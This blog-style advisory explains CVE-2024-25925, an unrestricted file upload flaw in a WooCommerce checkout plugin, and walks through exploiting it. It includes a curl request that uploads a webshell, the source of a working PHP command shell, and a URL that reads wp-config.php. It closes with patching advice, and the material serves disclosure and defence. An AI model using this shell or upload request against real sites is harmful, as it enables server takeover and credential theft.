CVE-2024-25925 - Unrestricted File Upload Vulnerability in SYSBASICS WooCommerce Easy Checkout Field Editor, Fees & Discounts

WordPress handle checkout customizations with ease thanks to popular plugins like WooCommerce Easy Checkout Field Editor, Fees & Discounts by SYSBASICS. But in early 2024, a serious security flaw tagged CVE-2024-25925 was discovered in this plugin — specifically, an unrestricted upload of files with dangerous types, affecting versions up to 3.5.12. Here, we break down exactly what went wrong, how attackers can exploit it, and what you need to do.

What Is CVE-2024-25925?

CVE-2024-25925 is a vulnerability found in the WooCommerce Easy Checkout Field Editor, Fees & Discounts plugin created by SYSBASICS. It allows users to upload any file type—without restriction—right from the checkout page. That means an attacker could upload dangerous files like .php scripts (which the server might execute), resulting in a full site compromise.

Affected Versions:
All versions up to and including 3.5.12.

Why Is This Vulnerability Dangerous?

WooCommerce plugins often capture extra information during checkout. This plugin’s file upload field lets store owners collect customer documents. But:

No user permission checks: Even unauthenticated users can upload files.

- Files go to a public location: Files may be stored in accessible paths, so a malicious file can be run straight from the browser or by tricking the server.

How the Exploit Works (Code Snippet)

Behind the scenes, WordPress plugins use PHP for file handling. In this case, the plugin fails to restrict file types and save locations.

Sample exploit POST request using curl

curl -X POST https://victim-shop.com/checkout/ \
  -F "easycheckout_file_field=@malicious-shell.php" \
  -F "other_checkout_info=value"

The attacker uploads malicious-shell.php (a PHP webshell).

- Since the plugin does not restrict or sanitize the file, it gets saved somewhere in /wp-content/uploads/ (or similar).
- Attacker then visits https://victim-shop.com/wp-content/uploads/malicious-shell.php to run their shell.

Relevant PHP Vulnerable Code (Pseudocode)

if (isset($_FILES['easycheckout_file_field'])) {
    // No proper check of file type!
    move_uploaded_file($_FILES['easycheckout_file_field']['tmp_name'], 
        $upload_dir . '/' . $_FILES['easycheckout_file_field']['name']);
}

*Notice*: There’s no check for allowed file types, and the file name is taken directly from user input.

Let’s see a basic PHP shell an attacker might upload

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>

Now, the attacker accesses

https://victim-shop.com/wp-content/uploads/malicious-shell.php?cmd=cat%20wp-config.php

And just like that, sensitive data is leaked or accounts are compromised.

Reference Links

- WPScan Vulnerability Entry – CVE-2024-25925
- NIST NVD Entry – CVE-2024-25925
- Plugin Official Page
- Patch Release Notes

Final Thoughts

CVE-2024-25925 shows how forgetting basic validation in a plugin can put thousands of stores at risk. If you’re using WooCommerce Easy Checkout Field Editor, Fees & Discounts, update right now, and always restrict what files users can upload. Attackers are always looking for the next open door—don’t give them easy access!

Timeline

Published on: 02/26/2024 16:27:59 UTC
Last modified on: 02/26/2024 16:32:25 UTC